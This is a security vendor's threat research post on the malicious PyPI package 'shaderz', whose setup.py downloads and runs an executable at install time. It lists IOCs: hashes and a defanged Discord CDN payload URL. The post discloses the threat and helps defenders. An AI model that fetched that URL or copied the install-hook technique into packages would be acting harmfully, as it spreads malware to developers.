FortiGuard Labs Threat Research
Supply Chain Attack via New Malicious Python Package, “shaderz” (Part 1)
Our Fortinet Advanced Research Team recently discovered a 0-day attack in a PyPI package (Python Package Index) called “shaderz”. It was discovered on December 6, 2022, through a system we use to monitor open-source ecosystems. This Python package was published on December 2, 2022, as shown in its official PyPI repository. Our suspicions were initially raised because it only has one published version, 0.0.1, and does not include a clear description of the package, the author’s email, or its source page.
Figure 1: Blank project description
Figure 2: Release history
The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation.
Figure 3: setup.py script
One particularly interesting element is the URL, which requires deeper analysis: https://cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub.exe.
As shown in the VirusTotal entry below, the download URL includes the following binary exe (SHA 256): 33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d.
While this download URL has not previously been detected by any other threat researchers, some vendors do flag the downloaded executable file as malicious.
Figure 4: This URL has not been detected by VirusTotal
Figure 5: Vendors that detect the downloaded executable
The downloaded executable seems to be a python script compiled into an executable file. We will share more details of our analysis of this file in our next post.
We will continue to monitor and help organizations defend against malicious packages found in the wild like this one to help protect our customers against attacks from unknown sources. For more detail, read part 2 of this blog.
Fortinet Protections
FortiGuard AntiVirus detects the malicious executable identified in this report as
W32/PossibleThreat
The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.
The FortiGuard Web Filtering Service detects as malicious and blocks the download URL cited in this report.
IOCs
shaderz-0.0.1[.]tar[.]gz
fd9f944fafb58faf783fdf4f8638d281a429b84cdb119756e6d7d92b31a079de
stub.exe
33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d
Malicious URLs
cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub[.]exe
Learn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s FortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.
